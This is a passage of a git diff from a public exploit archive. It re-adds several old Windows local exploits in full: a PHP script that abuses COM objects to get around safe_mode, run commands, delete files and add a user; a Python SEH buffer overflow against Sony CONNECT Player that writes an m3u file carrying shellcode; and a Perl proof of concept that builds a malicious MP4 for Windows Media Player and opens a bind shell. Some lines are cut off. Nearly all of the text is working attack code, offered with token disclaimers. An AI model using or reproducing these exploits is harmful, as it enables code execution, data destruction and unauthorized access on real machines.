    "; + +echo $MyBoot_ioncube; +?> + +# milw0rm.com [2007-10-11] diff --git a/platforms/windows/local/4553.php b/platforms/windows/local/4553.php index 4bd2caddc..5917c8958 100755 --- a/platforms/windows/local/4553.php +++ b/platforms/windows/local/4553.php 
@@ -1,68 +1,68 @@ - (sounds good) -//The windows version of PHP has built in support for this extension. You do not need to -//load any additional extension in order to use these functions. -//You are responsible for installing support for the various COM objects that you intend -//to use (such as MS Word); we don't and can't bundle all of those with PHP. - -//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are -//a lot of users if PHP developers decide to implement COM functions as part of PHP core. -//take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod). -//Anyway, I think they should take much care on security due to the fact that, through these -//functions, you can seriously compromise a pc. - -//For remote execution you need (naturally) to use a server that is MS based, -//e.g. Apache for win configured for working with PHP. -//In this scenario, someone could upload a script and then use it to damnage the server. - -//Local execution simply bypass all Windows protections against execution of dangerous -//COM objects (even kill-bit) due to the fact that the script is executed from a client that -//does not check these settings. - -//php.ini settings: -//safe_mode = On -//disable_functions = com_load_typelib -//open_basedir = htdocs - -//Remote execution requires that open_basedir is disabled - -$mPath = str_repeat("..\\",20); - -$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll -$compatUI->RunApplication("something", "notepad.exe", 1); //to run notepad.exe - -$wscript = new COM('wscript.shell'); //this one uses wscript.exe -$wscript->Run("cmd.exe /c calc.exe"); //to run calc.exe - -$FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx -$FSO->OpenTextFile($mPath."something.bat", 8, true); //to create a batch file on server... 
yes, - //if you want you can write to this batch file :) - -$FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx -$FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension - -$FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx -$FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder - -$shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll -$shgina->Create("shinnai"); //to add an user :) -?> - -# milw0rm.com [2007-10-22] + (sounds good) +//The windows version of PHP has built in support for this extension. You do not need to +//load any additional extension in order to use these functions. +//You are responsible for installing support for the various COM objects that you intend +//to use (such as MS Word); we don't and can't bundle all of those with PHP. + +//mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are +//a lot of users if PHP developers decide to implement COM functions as part of PHP core. +//take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod). +//Anyway, I think they should take much care on security due to the fact that, through these +//functions, you can seriously compromise a pc. + +//For remote execution you need (naturally) to use a server that is MS based, +//e.g. Apache for win configured for working with PHP. +//In this scenario, someone could upload a script and then use it to damnage the server. + +//Local execution simply bypass all Windows protections against execution of dangerous +//COM objects (even kill-bit) due to the fact that the script is executed from a client that +//does not check these settings. 
+ +//php.ini settings: +//safe_mode = On +//disable_functions = com_load_typelib +//open_basedir = htdocs + +//Remote execution requires that open_basedir is disabled + +$mPath = str_repeat("..\\",20); + +$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); //this one uses compatUI.dll +$compatUI->RunApplication("something", "notepad.exe", 1); //to run notepad.exe + +$wscript = new COM('wscript.shell'); //this one uses wscript.exe +$wscript->Run("cmd.exe /c calc.exe"); //to run calc.exe + +$FSO = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx +$FSO->OpenTextFile($mPath."something.bat", 8, true); //to create a batch file on server... yes, + //if you want you can write to this batch file :) + +$FSOdelFile = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx +$FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension + +$FSOdelFolder = new COM('Scripting.FileSystemObject'); //this one uses wshom.ocx +$FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder + +$shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); //this one uses shgina.dll +$shgina->Create("shinnai"); //to add an user :) +?> + +# milw0rm.com [2007-10-22] diff --git a/platforms/windows/local/4583.py b/platforms/windows/local/4583.py index 64a844aa1..0115cb1ea 100755 --- a/platforms/windows/local/4583.py +++ b/platforms/windows/local/4583.py 
@@ -1,55 +1,55 @@ -#!/usr/bin/python -#Secunia Advisory : SA27270 -#Release Date : 2007-10-29 -# Sony CONNECT Player M3U Playlist Processing Stack Buffer Overflow (m3u File) Local Exploit -# Bug discovered by Parvez Anwar -# Exploit Written by TaMBaRuS (tambarus@gmail.com) -# Tested on: Sony CONNECT Player (SonicStage) 4.x installed on Windows XP SP2/ 2k SP4 -# Shellcode: Windows Execute Command -# Eductional Purposes only ;) -## - -from struct import pack - -m3u = ("#EXTM3U\nhttp://%s") - -shellcode = ( -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54" -"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53" -"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a" -"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43" -"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" -"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49" -"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36") - -NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 -SE_HANDLER = 0x7CEA53D2 # POP POP RET (SHELL32.DLL/2k SP4) - -buf = "PLAY ME" -buf += "\x3e" * 1062 -buf += pack(" +# Eductional Purposes only ;) +## + +from struct import pack + +m3u = ("#EXTM3U\nhttp://%s") + +shellcode = ( 
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54" +"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53" +"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a" +"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43" +"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" +"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49" +"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36") + +NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 +SE_HANDLER = 0x7CEA53D2 # POP POP RET (SHELL32.DLL/2k SP4) + +buf = "PLAY ME" +buf += "\x3e" * 1062 +buf += pack("tempzip.zip") || die "Can't Write temporary File\n"; -binmode (code); -print code $zip_data; -close (code); -print "\nTemporary file ready, patching..\n"; -my $zip = Archive::Zip->new(); -$zip->read( 'tempzip.zip' ) ; -$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); -open(code, "+tempzip.zip") || die "Can't Write temporary File\n"; +binmode (code); +print code $zip_data; +close (code); +print "\nTemporary file ready, patching..\n"; +my $zip = Archive::Zip->new(); +$zip->read( 'tempzip.zip' ) ; +$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); +open(code, "+tempzip.zip") || die "Can't Write temporary File\n"; -binmode (code); -print code $zip_data; -close 
(code); -print "\nTemporary file ready, patching..\n"; -my $zip = Archive::Zip->new(); -$zip->read( 'tempzip.zip' ) ; -$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' ); -open(code, "+)); -print "\nAddress added, have fun!\n"; -close (code); -#indeed this sploit could have been written better without the ret address hassle, -#but it's intended to be only a POC, not a weapon for kiddies.. - -# milw0rm.com [2007-12-08] +#!/bin/perl +# +# Windows media player 6.4 MP4 Stack Overflow +# +# 0-day discovered and exploited by SYS 49152 +# +# Tested on win XP SP2 ENG +# Shell on port 49152 +# +# usage: +# - download this codec in order to manage MP4 content: +# http://www.3ivx.com/coral/3ivx_d4_451_win.exe +# +# - open the MP4 file with mplayer2.exe +# +# SYS 49152 +# gforce(put the @ here)operamail(put the . here)com +# +# update: +# the latest 5.0.1 codec is still vulnerable + + +use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); + +$zip_data = # code 724982 +"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36\xC5". +"\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00\x00". +"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". +"\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34". +"\xED\xD7\x0B\x70\x54\xD5\x19\x07\xF0\xB3\x9B\x8D\x80\x10\x26". +"\x55\x21\x6A\x29\x46\x40\x4D\x7D\xA4\x9B\x4D\xC8\x83\xA1\x1A". +"\x62\x72\x49\xD1\x00\x05\x12\x23\x89\x81\x65\x77\x21\xCB\x66". +"\xB3\xC9\xEE\xE6\x85\x80\x81\x28\x06\x8C\x96\x47\x78\x09\xD4". +"\xA0\xA0\xC4\x32\x3E\xA0\x15\x47\xA7\x45\xC6\x22\xA6\x2A\x56". +"\xAD\xF5\xD1\x8A\x15\x15\xA5\x5A\x85\x98\x89\x05\x5F\xFD\x4E". +"\xEE\x7F\xDD\x55\x47\x4B\x47\xC7\x8E\xFA\xFF\xE9\xC7\x39\xBB". +"\xF7\xDE\xF3\xF8\xCE\xBD\xE7\x66\x95\x52\xC9\xB3\xC3\x4D\x35". +"\x45\x19\xE3\x92\x95\xD0\xA5\xBF\x26\xC3\xE1\x0D\x05\xFC\xFA". +"\xB3\xB2\x74\x25\xF9\x03\x81\x7A\xA9\x55\xF9\xEB\x2B\xDD\xFA". +"\xAB\xDD\x25\x3F\x39\xB6\xA7\x72\xFA\x21\xA5\xAC\xA5\x4A\x9D". 
+"\xB7\x58\x59\x94\xFE\x3F\xEA\x33\x1F\xBE\xF8\x39\x57\x7D\x25". +"\xAB\x52\x09\x1D\xE1\xA0\xD3\x27\xF5\xF2\xB0\xAF\xAF\xCF\x7E". +"\xBA\xCF\xDD\x25\xC3\x2D\xD1\xD6\xA4\xDF\xCF\x77\xF1\x3F\xF5". +"\x9B\x30\xD6\xEF\xF6\x3A\xA5\x92\xEC\x77\x47\xE7\x65\xF6\xB1". +"\x3D\x5F\x0D\x2C\x55\xC5\x7F\xEC\x3B\xF1\xEC\x4A\x77\x55\x30". +"\x72\x55\x28\x50\x57\xFD\xB9\x5E\x06\xBD\xE7\xF7\x56\xCF\x96". +"\x4A\x62\xC8\x6F\x36\x04\xA3\xDC\xE6\xF7\xC3\xDC\x41\xCF\xEC". +"\x98\x21\x0D\xAA\x0B\x56\x25\x9B\xF5\x41\xBB\x42\xE1\x59\x55". +"\x52\x9F\x13\x0A\x87\xDC\x31\xE7\x5C\x21\x8B\xE0\xFC\xC2\x34". +"\xAC\x2A\x51\x17\x32\x3C\x2D\xDD\x13\x72\x87\x74\x25\xAE\xB9". +"\xB9\x79\x84\x94\x36\x29\x4F\xCB\x1D\xA2\xAC\x43\x95\x75\xEC". +"\x36\x65\xE9\x7E\x2C\x5E\xBE\xB1\x9E\x92\x78\x92\x14\x16\xC9". +"\xAB\x3A\x3D\x14\x0E\x87\xA2\xCD\x5A\xFF\x2A\x17\xE9\x7A\x8A". +"\x74\xEF\xFA\xB4\x13\xB3\xCB\x21\x28\x47\xEA\x21\x9B\xF5\x81". +"\x55\x72\xDE\xBC\xE8\x0C\xF5\xF5\xAA\xDF\xB7\x14\x4F\xC8\x10". +"\x3E\x94\x78\x4F\x42\xD7\x77\x4A\xFC\x45\x62\xBB\x44\xB3\x84". +"\xAC\x91\x65\x09\x8E\x6D\x91\xB8\x43\xE2\x5E\x89\x0D\x38\x77". +"\x9D\x84\xDC\xB3\x16\x19\xBF\xE5\x16\x89\x36\x89\x3B\x25\x24". +"\xCD\x96\xF9\x12\x4F\xE2\xF3\xAF\x24\x36\x22\x9E\x95\x78\x59". +"\x62\x81\xC4\xEF\x25\xCA\x25\x66\x49\xEC\x42\x9F\xB2\xAC\x96". +"\x22\x89\xB5\x12\xF2\x8C\x58\xF6\xA1\x7E\x2D\xEA\xCB\x25\xEE". +"\x96\x58\x23\x21\xF9\xB5\xDC\x24\x51\x23\x51\x68\xF6\x6F\x3D". +"\x59\xCA\x26\x89\xA9\x12\x25\x68\x2B\x5D\x62\xA9\x84\x17\xE7". +"\xD6\x49\x84\x25\x0C\x89\x3D\x38\xFF\x25\x89\xD7\xF0\xFD\xE5". +"\x12\x73\x10\x41\x94\xF3\x62\x4A\x37\xDA\xD1\xE3\xBE\x46\xC2". +"\x83\xF3\xF4\xFC\x57\x20\x16\x49\xDC\x2C\xB1\x43\xE2\x3A\xC4". +"\x0A\x8C\xBB\x1D\xB9\x5C\x87\xFA\x6F\x70\xAE\xCE\xC7\xAB\x12". +"\xC7\x31\xC7\x95\x98\x9F\x1F\x79\x89\xE4\x4A\x8F\x73\x31\xAE". +"\xFD\x2D\xCA\xDF\x49\xBC\x2D\x71\x40\x62\x35\xC6\x37\x37\x66". +"\x2D\x1F\x91\x78\x00\xF9\x0F\x62\x8D\x1E\x96\x98\x89\xF6\xAB". 
+"\x91\xEF\x0D\xC8\x53\x03\xD6\x5E\xB7\x7D\xB5\xC4\x2A\xE4\xE9". +"\xEF\x12\xFF\xC4\x5A\x2E\xC5\x38\xF4\xFA\x36\x4A\x74\x4A\x5C". +"\x8F\xF3\x57\x60\x0E\x95\x18\x87\x07\xD7\xD7\x21\x87\xDE\xCF". +"\xCD\x4B\xF6\x26\x4B\xAB\x44\x87\xC4\x36\x94\xFA\xBA\x85\x38". +"\xBF\x1A\x9F\x67\x63\x6C\xB5\x68\xB3\x4B\xE2\x6F\x18\xC7\x22". +"\xF4\x1F\x42\xBE\x97\x21\x5F\x3E\xAC\x59\x10\xED\x34\x63\xDD". +"\xE6\xE0\xBA\x6B\x31\x57\x7D\x6F\x3F\xAD\xCC\x7B\x79\x31\x72". +"\x7F\x0D\x42\x5F\x13\xC6\xBC\x17\xA0\xFD\xF9\x68\x57\x1F\xDF". +"\xAF\xCC\x67\xE1\x6D\xCC\x2B\x88\xF3\x3D\x18\x73\x08\x7D\xEB". +"\x3E\xCB\xF0\xBD\x5C\x2B\x1B\x8B\xB9\x5E\x0B\x31\xBF\xCA\x98". +"\x73\xCB\x70\x7E\x1D\x72\x3A\x2F\x66\xAC\xF3\x51\x5F\x8A\xCF". +"\x7A\x9D\xEF\x97\xB8\x15\x63\x5C\x8D\xB9\xE8\xF1\x5C\x85\x6B". +"\xFF\x85\x75\x9C\x87\xF5\xD2\xF7\x4A\x40\x99\xCF\x91\x07\x39". +"\xBD\x3A\x66\x7E\x3A\x97\x1B\xD0\x57\x18\x39\xD0\xF7\xD0\xAB". +"\x38\xB7\x16\x6B\xF1\x9C\x32\xEF\xE7\x76\xE4\x4C\xDF\x23\x2B". +"\x91\xFB\x46\xCC\xC9\x17\x73\x4D\x13\xFA\xF3\xE1\x7C\x7D\xAE". +"\x7E\x4E\x6E\x97\xB8\x51\x99\xF7\xCE\x53\x98\x8F\x1E\x83\xDE". +"\x43\x1E\x54\xE6\x33\xA2\xEF\xB1\x16\x89\x83\x98\x6B\x15\x72". +"\x1D\xC0\xBC\xD6\x61\x3D\x36\x21\x07\x0D\x18\xFB\x5E\xB4\xF3". +"\x3C\xD6\x76\x21\xE6\xA8\xD7\xBA\x15\xE3\x8A\x3C\xCF\x8F\x23". +"\xFF\x0D\xC8\xFF\x2C\x94\x7E\xCC\xC7\x8D\xB1\xD7\x60\x6E\x01". +"\x44\x4D\xCC\x5A\x5F\x89\xF5\x69\xC0\x18\x9B\x50\xDF\x86\xF1". +"\x2F\xC7\xBC\x75\x3B\xF7\x49\x4C\xC6\xDC\xDD\xC8\xE3\x38\x8C". +"\x77\x22\xD6\xF8\x12\xE4\xEA\x5E\x7C\x97\xA3\xCC\x67\x44\xEF". +"\xC3\x3F\x97\xB8\x58\xE2\x1E\x89\x6C\xB4\xAF\xE7\x5F\x8C\x75". +"\xD1\x73\x2A\x45\x2E\x2B\x70\xBE\x5E\x7B\x2F\xE6\x96\xA9\xCC". +"\x7B\x26\x13\xF9\xE8\xC1\x3A\x1B\xC8\x43\xAE\xC4\x74\x89\x11". +"\x18\x9B\xCE\x67\x0A\xFA\x5F\x8E\x7C\xEA\x3D\x56\xDF\x1F\x6B". +"\x90\xCB\xB9\xB8\xB6\x16\x39\xD3\xB9\x99\x81\xEF\x9B\x90\x73". +"\xBD\x6E\xFA\xDE\x6A\x43\x79\x0E\xD6\x58\xD7\xFF\x8C\x5C\xBC". 
+"\xA3\xCC\x7D\xBF\x16\xF9\x7C\x04\x79\xD8\xAA\xCC\x3D\xCC\x8D". +"\xBC\x36\xC5\xAC\xEB\x2B\xC8\xB9\xBE\xC7\x66\xAA\xE8\x9E\x51". +"\x83\x35\xD4\xFB\x55\x81\x32\xF7\x3B\x3F\xAE\xD3\xC7\x17\xE1". +"\xBB\x1B\xD1\x97\x8E\x51\xF2\x9E\xFC\x40\xCA\x91\xC8\x81\xCE". +"\x91\x43\x22\x49\xA2\x3F\xC6\xE0\xC1\x75\x37\x63\x9C\x8F\xCA". +"\x73\x6D\x41\xFE\xF4\x7D\xA3\xF7\x21\x7D\x4F\x2D\xC1\x5A\x36". +"\x23\x27\x3A\x77\x01\xF4\xB7\x18\x9F\x17\x22\xAF\xFA\x39\xBC". +"\x12\x6D\x57\xA2\x5C\xA4\xA2\x7B\x4A\x64\x4F\xBA\x1E\x75\x2F". +"\xC6\x57\xA9\xA2\xF7\x9A\xCE\xF5\x24\xE4\x7D\x26\xD6\x7A\x06". +"\x8E\x4F\xC4\xE7\xC8\x3E\x5A\x87\x5C\xFA\xD1\x46\x0B\xDA\xD4". +"\x6B\xA8\xDF\x47\x67\x49\xE4\xA1\x3D\xFD\x4E\x8D\xC3\x1C\xF4". +"\xFD\xFC\x2E\xF2\xA3\xF3\xAC\xF7\x8E\x72\xB4\xA7\xEF\x6D\xBD". +"\xF7\xBC\xA8\xCC\xF7\x53\x21\xDA\x98\x80\xF9\x85\xB0\xD6\xB3". +"\x55\x74\xEF\xB9\x09\xDF\xB7\xAA\xE8\xFE\x3D\x17\xB9\xB9\x01". +"\xE3\xAA\xC3\xB1\x05\x98\x4F\x33\xF2\x77\x0D\xAE\xF3\xA1\xAD". +"\xC5\x2A\xFA\xEC\xEA\x3D\xEE\x3A\x15\xDD\x67\x1B\xB1\x1E\xEB". +"\x71\x5D\x0B\xBE\xD3\x7B\xCF\x26\xAC\x7D\xE4\xEF\x9A\x6A\x8C". +"\xAB\x59\x45\xEF\x5D\x7D\x2F\x05\x91\x23\x1D\x57\x60\x3C\x7E". +"\xC4\xD5\x2A\xBA\x2F\x35\x62\x8E\x01\xF4\x35\x13\xEB\x73\x05". +"\xD6\xD8\xA7\xA2\xEF\x09\xBF\x8A\xEE\xC9\x57\x61\x0E\x01\xCC". +"\xC1\x83\xE3\xB1\xF7\x42\x23\xFA\x5F\x1C\x33\xF7\xF9\x18\x4B". +"\x10\xE3\x95\xE7\x4B\x1D\xC7\x98\xCA\x90\xBF\x46\xF5\xE9\x5E". +"\xA6\x7A\x91\x4F\x7D\xFF\xEA\xFB\x59\xEF\x9B\xFA\x5E\x5A\x83". +"\x6B\x22\xCF\xAF\x0F\x63\x89\x3C\xDF\x2D\xC8\xEF\x92\x98\x39". +"\xD6\x23\x77\x91\xB5\x5D\x8A\x71\x84\xD0\x47\xE4\x3D\x1D\xD9". +"\xA3\x6E\xC6\xF5\x7A\x6D\x6E\xC7\xB8\x17\x20\xD7\xBA\x9D\xC8". +"\xFB\x3C\xF2\x37\x65\xEC\xFB\xB1\x09\xFD\x96\xA3\xAE\x73\x54". +"\x85\xF6\x9B\x90\xAB\x06\xAC\xB9\x7C\x56\x1B\x43\x61\x57\x00". +"\x7F\x68\x8F\x94\x3F\x1D\x2E\x91\x78\x5A\xFE\x9C\xCA\x55\xD6". +"\x93\x12\x94\xF5\x9C\x63\xCA\x9A\x7F\x40\x59\x3D\x15\xCA\x7A". 
+"\x7D\xAB\xB2\x6E\x2B\x54\xD6\x47\xAD\xCA\xFA\xC6\x11\x15\xD7". +"\x6F\xB3\x8A\x3B\xEF\x80\x8A\x1B\x7F\x83\x8A\xAB\x1C\xAB\xE2". +"\x5A\xD7\xA9\xB8\x3B\x2F\x57\x71\x7F\xBA\x43\xC5\x1D\xBE\x50". +"\xD9\xFA\x1D\x53\xB6\x73\xFF\xAD\x6C\xF9\x0F\x2B\x9B\xA7\xBF". +"\xB2\x5D\x9B\xA8\x6C\x9B\x8B\x95\xED\xA1\x6A\x65\x7B\xA9\x5B". +"\xD9\x3E\x2C\x54\xF1\x67\xBE\xA9\xE2\xC7\xA4\xA9\xF8\xD2\x37". +"\x54\x7C\xFD\x0E\x15\xDF\xDE\xA6\xE2\x77\x96\xA8\xF8\xA7\x5F". +"\x96\xD7\x5B\x5C\x9D\x3B\xEC\x94\x6D\xF7\x03\xBF\x27\x1C\xF9". +"\x99\xF2\x99\xDF\x49\xF2\xDB\x2A\xE8\xAC\xA9\xA9\x8A\xFE\x56". +"\xB0\xEC\x3C\xEC\x95\x9F\x0F\xF2\x4E\x78\xA0\xB3\xDA\xE9\x97". +"\x72\x87\xDB\xD9\x77\x71\xDF\xEF\x9B\x49\xF5\x9E\x60\xB8\x2E". +"\xE8\x49\x73\xA4\x67\x8C\xCE\xCC\xCA\xCE\xB1\x3B\x43\xF1\x56". +"\x8B\x71\x91\xC5\x62\x14\x1A\xCD\xB9\x86\xFE\xAF\x79\x99\x59". +"\x34\x9B\xC5\x30\xB3\xB0\x99\xC5\x40\xB3\xE8\x2E\xF8\xFA\x72". +"\x0B\x26\x17\x94\x15\xE4\x5E\xDA\xFF\x58\xB8\xF5\xAD\x0B\xBA". +"\x5A\x0E\xDF\xF3\xC2\x3B\x2F\x84\x47\xF5\x94\x2D\x0A\x9D\xFA". +"\xC8\xF4\x8D\x9B\x5B\xDE\xFA\xF0\x60\xCF\x18\x7B\xC3\xDB\xA9". +"\xB7\xB9\x2A\x72\xC6\x24\x3D\x71\x70\x61\xD2\x6B\xC7\x9F\xFA". +"\xC7\x96\x3F\x94\x85\xCE\x5F\x9A\x97\xF4\xF1\xA1\xB2\x86\x37". +"\x8B\xAA\x93\x3A\x52\x7C\xE5\xD9\x73\x0F\x94\x3F\xBB\x67\x43". +"\xC9\xF6\x7D\xEB\x1A\x8A\x3F\x1A\x7C\xFF\xD2\x9D\xBB\x93\x3E". +"\x3E\x58\xD6\xB0\xAF\xA8\xE4\xB9\xF3\xD7\x1B\x9B\x26\xEC\xAD". +"\x4F\x4A\xB9\x73\x61\xF3\x43\xF1\xBE\xF1\x7B\x8B\xCE\xD8\x7E". +"\xFE\x92\x92\xA4\xA7\x5E\x7C\x3F\xE9\x95\xFD\xB6\x9E\x9F\xB5". +"\x4E\xAB\x39\x9A\xD3\x76\xBC\xBB\xC3\x71\xF7\xAA\xBB\x2E\x7A". +"\x77\xD5\xFA\xC1\xAE\xDA\xBB\x56\xD4\x5E\xF5\xD1\xC9\xAE\x86". +"\xF5\xCF\x34\xED\x1B\xBF\xAB\xFD\xB6\x55\xF6\x5F\x57\x0C\x75". +"\x14\x6C\x4B\x7F\xFF\xB1\x8A\xC4\x01\x4F\x76\xAF\x1E\xF0\x72". +"\xF7\x75\x03\x5C\xB5\x1D\x8E\xF2\xCD\x1D\x03\x86\xE4\x4E\x75". +"\x64\x3F\x78\xDF\x26\x39\x66\x6F\x3B\xB2\x6A\xEB\xE5\x5D\xB3". 
+"\xDE\xDF\x51\xB8\x62\xEB\x84\x6E\x5D\x1F\x79\xEA\x99\x6F\x4A". +"\xFD\xE8\xCA\xC1\x5D\x15\x43\xBB\x7A\x8C\xDD\x1B\x5F\xEF\xCD". +"\x69\x93\xFA\xD8\xDE\xBD\x1D\x8E\x4F\x1E\x9F\xB4\xBB\xF7\xE8". +"\x2D\xA1\xC9\x29\x67\xDB\x9F\x4F\x19\xE5\x2B\x9F\x52\xB5\xE5". +"\x40\x5B\xF6\xE9\xF7\x38\x2E\x4B\xDE\x72\xB2\xFF\x68\xCF\x33". +"\xD9\x87\x97\x55\xEC\x1C\xEE\x6A\xD8\x94\xB0\xFF\xC8\xDA\x81". +"\xBD\x1D\x6B\x07\x76\x1D\xC9\x59\xD6\x33\xE8\xAC\x19\x53\xBA". +"\x73\xDA\x7A\x2B\x72\xFC\xAE\xDA\xA2\x84\x99\x23\xAC\x17\xBB". +"\x1A\xDA\xA5\xBF\x9F\xB6\xCF\xDF\xB3\x7A\xEB\x84\x8A\xA1\x92". +"\xC4\x61\xDF\xC0\x42\x7D\xB3\x0C\x22\xA2\xEF\x84\x5C\xE3\xEE". +"\xFD\x46\x89\x51\x6A\xC4\x0F\x30\x5F\x93\x93\x8D\x32\x23\x3E". +"\xD1\xAC\xCB\x8B\xF0\x13\xF9\xA7\xD0\x30\x5F\x9C\x85\x5F\x1A". +"\xB6\x2F\x3B\x30\xD5\xB0\x95\xBE\x6A\x5C\x6A\x5C\xF6\x75\xE2". +"\xD0\xA1\x43\x27\x32\x95\x13\x3A\x89\x88\xBE\xBB\x0A\xB5\xFF". +"\xF7\x20\x88\x88\x88\x88\x88\xE8\x7B\xA9\x98\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\xE8\x87". +"\xA0\x94\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\xBE\x57\x8A\x89\x88\x88\x88". +"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x7E". +"\x38\x66\x12\x11\x11\x11\x11\x11\x11\x11\xD1\x7F\x51\x40\xDF". +"\x9E\x34\xA5\xD4\xB9\x9D\xE3\xA6\x4C\x93\x72\xB8\xDB\x19\x76". 
